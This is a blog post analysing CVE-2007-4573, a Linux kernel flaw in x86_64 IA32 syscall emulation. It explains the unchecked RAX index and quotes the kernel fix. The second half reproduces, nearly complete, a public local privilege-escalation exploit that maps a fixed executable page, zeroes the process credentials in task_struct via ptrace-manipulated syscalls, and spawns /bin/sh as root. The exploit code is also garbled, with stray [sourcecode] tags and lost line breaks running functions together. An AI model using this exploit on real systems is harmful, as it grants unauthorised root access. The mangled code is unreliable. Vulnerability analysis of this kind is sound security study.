xorl %eax, %eax

CVE-2007-4573: Linux kernel IA32 System Call Emulation Vulnerability

leave a comment »

This is an old but one of my favorite Linux kernel vulnerabilities. The bug was discovered and disclosed by cliph. The bug was present in 2.4 as well as 2.6 branches prior to 2.6.22.7 release but only on x86_64 architectures. Here is a code snippet from 2.6.22 release of the Linux kernel.

sysenter_do_call:       
        cmpl    $(IA32_NR_syscalls-1),%eax
        ja      ia32_badsys
        IA32_ARG_FIXUP 1
        call    *ia32_sys_call_table(,%rax,8)

This assembly code resides at arch/x86_64/ia32/ia32entry.S and it is used to provide IA32 emulation on 64-bit architectures. This sysenter_do_call implementation first compares the contents of EAX with the length of the system call table to ensure that it is inside its bounds. If this fails it will jump to label ‘ia32_badsys’. Otherwise, it will execute IA32_ARG_FIXUP macro which is used to fix the arguments from 64-bit registers to 32-bit ones like this:

        .macro IA32_ARG_FIXUP noebp=0
        movl    %edi,%r8d
        .if \noebp
        .else
        movl    %ebp,%r9d
        .endif
        xchg    %ecx,%esi
        movl    %ebx,%edi
        movl    %edx,%edx       /* zero extension */
        .endm 

Finally, it calls the element of system call table, located at the offset pointed by RAX register. Since RAX is not checked it could contain values that are beyond the bounds of system call table as cliph noticed. The exact same vulnerability was also present at ‘cstar_do_call’ and ‘ia32_do_syscall’. Linux kernel immediately released a new version after the disclosure of that bug, this was the 2.6.22.7 which was fixing just this bug as we can read from its ChangeLog. The patch was written by Andi Kleen of SUSE and specifically, what it did was to add a new macro named LOAD_ARGS32 that loads the 32-bit registers like this:

 	.endm
 
+	.macro LOAD_ARGS32 offset
+	movl \offset(%rsp),%r11d
+	movl \offset+8(%rsp),%r10d
+	movl \offset+16(%rsp),%r9d
+	movl \offset+24(%rsp),%r8d
+	movl \offset+40(%rsp),%ecx
+	movl \offset+48(%rsp),%edx
+	movl \offset+56(%rsp),%esi
+	movl \offset+64(%rsp),%edi
+	movl \offset+72(%rsp),%eax
+	.endm
+	
 	.macro CFI_STARTPROC32 simple

And use this instead of LOAD_ARGS to reload the arguments from the stack in case of changes using ptrace(2) like this:

@@ -152,7 +164,7 @@ sysenter_tracesys:
 	movq	$-ENOSYS,RAX(%rsp)	/* really needed? */
 	movq	%rsp,%rdi        /* &pt_regs -> arg1 */
 	call	syscall_trace_enter
-	LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+	LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
 	RESTORE_REST
 	movl	%ebp, %ebp
 	/* no need to do an access_ok check here because rbp has been
@@ -255,7 +267,7 @@ cstar_tracesys:
 	movq $-ENOSYS,RAX(%rsp)	/* really needed? */
 	movq %rsp,%rdi        /* &pt_regs -> arg1 */
 	call syscall_trace_enter
-	LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+	LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
 	RESTORE_REST
 	movl RSP-ARGOFFSET(%rsp), %r8d
 	/* no need to do an access_ok check here because r8 has been
@@ -334,7 +346,7 @@ ia32_tracesys:
 	movq $-ENOSYS,RAX(%rsp)	/* really needed? */
 	movq %rsp,%rdi        /* &pt_regs -> arg1 */
 	call syscall_trace_enter
-	LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+	LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
 	RESTORE_REST

Also, they changed arch/x86_64/kernel/ptrace.c’s putreg() which is used to put the value in a register when using ptrace(2) system call.

 	unsigned long tmp; 
 	
-	/* Some code in the 64bit emulation may not be 64bit clean.
-	   Don't take any chances. */
-	if (test_tsk_thread_flag(child, TIF_IA32))
-		value &= 0xffffffff;
 	switch (regno) {
 		case offsetof(struct user_regs_struct,fs):

test_tsk_thread_flag() tests if ‘child’ task has ‘TIF_IA32’ flag which stands for 32-bit processes.
Even though this sounds cool, the coolest part for that vulnerability (as in most cases as well) was its exploitation. Since there is already public exploit code I will discuss that one too. That public exploit for IA32 emulation bug was developed by Robert Swiecki, Przemyslaw Frasunek and Pawel Pisarczyk of ATM-Lab.
The exploit code features a function named docall(). This is used to mmap(2) the user specified location passed to it through ‘ptr’ argument to a page of size defined by argument ‘size’ with read, write and executable properties. Then, it has a for loop which fills that page with the contents of ‘kernelmodecode’ routine. Finally, it loads up RAX with 0x101 which is the system call number of remap_file_pages() system call and performs the call using interrupt 0x80.

static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &euid, &suid);

uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf(“mmap fault\n”);
exit(1);
}

for (; ptr < (tmp + size); ptr++) *ptr = (uint64_t)kernelmodecode; __asm__("\n" "\tmovq $0x101, %rax\n" "\tint $0x80\n"); printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); execl("/bin/sh", "bin/sh", 0); printf("no /bin/sh ??\n"); exit(0); } [/sourcecode] This should trigger the bug into jumping to the location of the newly allocated page which has the 'kernelmodecode'. This code, is declared as a function which you can see here: [sourcecode language="c"] static void kernelmodecode(void) { int i; uint8_t *gs; uint32_t *ptr; asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs)); for (i = 200; i < 1000; i+=1) { ptr = (uint32_t*) (gs + i); if ((ptr[0] == uid) && (ptr[1] == euid) && (ptr[2] == suid) && (ptr[3] == uid)) { ptr[0] = 0; //UID ptr[1] = 0; //EUID ptr[2] = 0; //SUID break; } } } [/sourcecode] What it does is retrieving the location (at 0 offset) of GS segment selector and then iterate to it until it finds our UID at ptr[0], EUID at ptr[1], SUID at ptr[2] and UID at ptr[3]. We got those values during the docall() function using getresuid() and those are ordered this way since (as we can read at include/linux/sched.h) kernel structure task_struct which describes its task includes this: [sourcecode language="c"] struct task_struct { ... /* process credentials */ uid_t uid,euid,suid,fsuid; gid_t gid,egid,sgid,fsgid; ... } [/sourcecode] So, when it finds this structure of our task it sets its credentials to zero and breaks. Now that we now the details we can move to the core exploitation which happens in main() function. As you can see docall() is invoked like this: [sourcecode language="c"] int main(int argc, char **argv) { int pid, status, set = 0; uint64_t rax; uint64_t kern_s = 0xffffffff80000000; uint64_t kern_e = 0xffffffff84000000; uint64_t off = 0x0000000800000101 * 8; if (argc == 4) { docall((uint64_t*)(kern_s + off), kern_e - kern_s); exit(0); } [/sourcecode] Using those offsets (which are definitely out of the bounds of 32-bit EAX register) it would make sys_call_table[] jump to the previously mmap(2)'d location. If we continue with main() we'll see this one: [sourcecode language="c"] if ((pid = fork()) == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execl(argv[0], argv[0], "2", "3", "4", 0); perror("exec fault"); exit(1); } if (pid == -1) { printf("fork fault\n"); exit(1); } [/sourcecode] Here is a simple child spawn/ptrace attach code which should be done to the same binary in order to trigger the call to docall() which will only be called if main() is called with four arguments. Now, assuming that we have our parent/child processes we can move to this code: [sourcecode language="c"] for (;;) { if (wait(&status) != pid) continue; if (WIFEXITED(status)) { printf("Process finished\n"); break; } if (!WIFSTOPPED(status)) continue; if (WSTOPSIG(status) != SIGTRAP) { printf("Process received signal: %d\n", WSTOPSIG(status)); break; } [/sourcecode] This is some simple checks on the child process' status. First of all, it ignores states from other processes that it might have, and then it checks if the child finished using WIFEXITED(), if it is stopped and finally, if a signal (apart from TRAP) is sent to it. Finally, this code takes place in main(): [sourcecode language="c"] rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); if (rax == 0x000000000101) { if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { printf("PTRACE_POKEUSER fault\n"); exit(1); } set = 1; } if ((rax == 11) && set) { ptrace(PTRACE_DETACH, pid, 0, 0); for(;;) sleep(10000); } if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { printf("PTRACE_SYSCALL fault\n"); exit(1); } } return 0; } [/sourcecode] Variable 'rax' is initalized using PTRACE_PEEKUSER with the value of current RAX register in the child process. If that value is that of 0x000000000101 which is the system call number that was inserted in docall(), it will change it using PTRACE_POKEUSER with that of the previously calculated 'off' and flag 'set' will be set to 1. If now, variable 'rax' is 11 and 'set' flag is non-zero, it will detach from the process and consequently continue the execution from the 'int 0x80' part which will attempt to call sys_call_table[(0x0000000800000101 * 8)] which is where 'kernelmodecode' resides. Hopefully, this will find the credentials, change them to 0 and then perform the execl("/bin/sh", "bin/sh", 0) call. If this fails, it will restart the tracing using PTRACE_SYSCALL to restart the execution and break at the first system call. P.S.:

* nnp kind of wishes that xorl would go into more detail on the 
   exploits for interesting vulnerabilities, rather than just the vulns

You were right. I will write about exploits when there are public codes available. :)

Written by xorl

August 7, 2009 at 10:42

Posted in bugs, linux

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s